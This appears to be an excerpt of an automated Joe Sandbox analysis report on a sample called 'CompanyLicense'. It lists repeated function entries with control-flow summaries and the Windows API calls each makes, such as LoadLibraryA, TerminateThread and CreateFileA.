                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 388 566f6e-56706d call 567679 392 56706f-56708f call 567679 388->392 393 56709b-5670b6 call 5670b7 LoadLibraryA call 5670b7 388->393 392->393 398 567091-567096 call 567679 392->398 398->393
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,321C9581,?,00568349,005632BD,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005670A8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 403 562d8f-562dc5 404 562dc7-563ea4 TerminateThread * 2 call 562ed5 403->404 405 562dbb-562dc5 403->405 411 563fee-563ff5 404->411 412 563eaa-563fad 404->412 405->404 405->405 412->411 414 563faf-563fbf call 563cc1 call 563cde 412->414 414->411 419 563fc1-563fc4 414->419 419->411 420 563fc6-563feb 419->420
                                      APIs
                                      • TerminateThread.KERNEL32(000000FE,00000000), ref: 00562ECA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: TerminateThread
                                      • String ID:
                                      • API String ID: 1852365436-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 422 562db8 423 562dbb-562dc5 422->423 423->423 424 562dc7-562eca TerminateThread 423->424 426 562ed0-563ea4 TerminateThread call 562ed5 424->426 430 563fee-563ff5 426->430 431 563eaa-563fad 426->431 431->430 433 563faf-563fbf call 563cc1 call 563cde 431->433 433->430 438 563fc1-563fc4 433->438 438->430 439 563fc6-563feb 438->439
                                      APIs
                                      • TerminateThread.KERNEL32(000000FE,00000000), ref: 00562ECA
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: TerminateThread
                                      • String ID:
                                      • API String ID: 1852365436-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 441 566f5a-566f62 442 5670a8-5670b6 LoadLibraryA call 5670b7 441->442 443 566f68-56706d call 567679 441->443 449 56706f-56708f call 567679 443->449 450 56709b-5670a5 call 5670b7 443->450 449->450 455 567091-567096 call 567679 449->455 450->442 455->450
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,321C9581,?,00568349,005632BD,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005670A8
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00564127,00564170), ref: 00564162
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00566409
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.998526794.0000000000562000.00000040.00000001.sdmp, Offset: 00562000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_562000_CompanyLicense.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions